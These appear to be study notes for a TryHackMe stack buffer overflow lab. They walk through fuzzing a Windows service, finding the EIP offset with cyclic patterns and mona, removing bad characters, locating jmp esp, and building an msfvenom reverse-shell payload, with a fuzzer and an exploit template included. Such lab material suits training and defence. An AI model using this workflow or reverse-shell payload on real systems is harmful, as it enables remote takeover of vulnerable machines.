# point n shoot

ref: TryHackMe BOF path

Connect to the remote Windows box:

### How to RDP into Windows?

```
xfreerdp /u:admin /p:password /cert:ignore /v:MACHINE_IP /workarea
```

### Exploitation

Step 1: Start Immunity Debugger with admin permissions.\
Step 2: Attach to, or open, the target application and put it into the running state.

The binary opens in a paused state; it has to be running before you fuzz it.

### How to set the working folder in Immunity Debugger?

```
!mona config -set workingfolder c:\mona\%p
```

### On the attacker machine (Kali)

Step 1: Port scan and identify the target port.\
Step 2: `nc ip port`, check the command options, and set the fuzzer script prefix accordingly.\
Step 3: Run the fuzzer (`python fuzzer.py`) and wait for it to report the crashing byte count, then add 400 to that number.\
For example, if the program crashed at 200 bytes, create a 600-byte pattern.\
Step 4: Create a cyclic pattern with the metasploit pattern_create tool:

```
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
```

Step 5: Put the pattern in the `overflow` variable of exploit.py, run the script, observe EIP in the debugger, then run:

```
!mona findmsp -distance 600
```

`-distance` is the length of the pattern you created; the output gives you the offset.\
You can double check it with the following (the argument is the value of EIP after the crash with the pattern):

```
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 76413176
```
\
Step 6: Confirm the offset\
Set the offset value in exploit.py so that it sends `offset` bytes of "A" followed by "BBBB" as the retn / EIP value.\
Observe EIP: if it reads 42424242 the offset is correct.

Step 7: Find bad chars [the fastest and easiest way]\
Generate a byte array excluding the null byte (the null byte is always a bad char):

```
!mona bytearray -b "\x00"
```

Use the python script in the appendix to generate the same byte array on the attacking machine as well.

Now send the byte array in the payload section of the python exploit, crash the app, and note the value of ESP (copy this value).\
Then run this command to check for bad chars, passing the ESP value to `-a`:

```
!mona compare -f C:\mona\oscp\bytearray.bin -a <address of esp>
```

For example, with esp = 0188FA30:

```
!mona compare -f C:\mona\oscp\bytearray.bin -a 0188FA30
```

If the reported bad chars form a consecutive sequence, only keep the first char of the sequence (the following bytes are corrupted by the first one).

Rinse and repeat:\
Update the payload variable, remove the new bad chars from the python exploit, and create a new byte array with the mona module again, excluding them:

```
!mona bytearray -b "\x00\x23\x3c\x83\xba"
```

Rerun the exploit, crash the app, check ESP again, and rerun the compare with the new address:

```
!mona compare -f C:\mona\oscp\bytearray.bin -a <address of esp>
```

For example, with esp = 0193FA30:

```
!mona compare -f C:\mona\oscp\bytearray.bin -a 0193FA30
```

Find jmp esp\
After crashing or before crashing (it does not matter); list all your bad chars after the `-cpb` parameter:

```
!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"
```

The string after `-cpb` holds all your bad chars.

Pick an address of a `jmp esp` and save it in reverse order (little-endian) as the retn / EIP value in exploit.py.

Generate your shellcode using msfvenom, excluding the null byte and every other bad char you found:

```
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00morehere" -f c
```

Paste the output in the payload section, like:

```
payload = ("adfadfa"
"adadfa"
"afdawfda"
"awdfawdf")
```

Set some NOPs as padding, somewhere between 12 and 20:

```
nop = "\x90" * 16
```

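As an added example (not part of the TryHackMe notes and not the metasploit tools themselves), the following Python reimplements what `pattern_create.rb`, `pattern_offset.rb` / `!mona findmsp` and the "reverse order" step actually compute, so you can see why the pattern has to be longer than the crash length and why the EIP value has to be byte-swapped; the `0x12345678` return address is a constructed placeholder.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits


def pattern_create(length):
    """Same cyclic pattern as metasploit's pattern_create.rb: one upper,
    one lower, one digit per triplet, the digit cycling fastest
    ("Aa0Aa1Aa2...Aa9Ab0...")."""
    out = []
    for up in ascii_uppercase:
        for lo in ascii_lowercase:
            for dg in digits:
                out.append(up + lo + dg)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern, eip):
    """Offset of the 4 pattern bytes that landed in EIP after the crash.
    `eip` is the value the debugger shows (e.g. 0x76413176). x86 is
    little-endian, so the bytes sit in memory in reverse order and the
    value must be unpacked with "<I" before searching the pattern.
    Returns -1 when the value is not part of the pattern, i.e. when the
    pattern was shorter than the crash length."""
    needle = struct.pack("<I", eip).decode("latin-1")
    return pattern.find(needle)


def pack_ret(addr):
    """Little-endian encoding of a return address for the retn field,
    which is the 'reverse order' the notes mention:
    0x12345678 -> b"\\x78\\x56\\x34\\x12"."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    # EIP value taken from the notes above: found at offset 634 in a
    # long pattern, but not found at all in a 600-byte pattern.
    print(pattern_offset(pattern_create(8192), 0x76413176))  # 634
    print(pattern_offset(pattern_create(600), 0x76413176))   # -1
    print(pack_ret(0x12345678))  # constructed placeholder address
```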
### Appendix: fuzzer (python3)

```
#!/usr/bin/env python3

import socket, time, sys

ip = "MACHINE_IP"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "   # command prefix taken from the nc session

string = prefix + "A" * 100

while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            s.recv(1024)   # banner
            print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
            s.send(bytes(string, "latin-1"))
            s.recv(1024)   # no reply within the timeout means the service crashed
    except OSError:        # connection refused / reset / timeout
        print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
        sys.exit(0)
    string += 100 * "A"
    time.sleep(1)
```
### Appendix: exploit.py

```
#!/usr/bin/env python3
import socket

ip = "MACHINE_IP"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
# this is your junk
overflow = "A" * offset
# this is eip; enter the jmp esp address in reverse (little-endian) byte order
retn = ""
# this is the nop sled
padding = ""
# here goes your shellcode in c format
payload = ""
# remaining bytes from the total
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(bytes(buffer + "\r\n", "latin-1"))
    print("Done!")
except OSError:
    print("Could not connect.")
```
### Appendix: python badchar create

```
# prints \x01 .. \xff as one string; the null byte is left out on purpose
for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')
print()
```
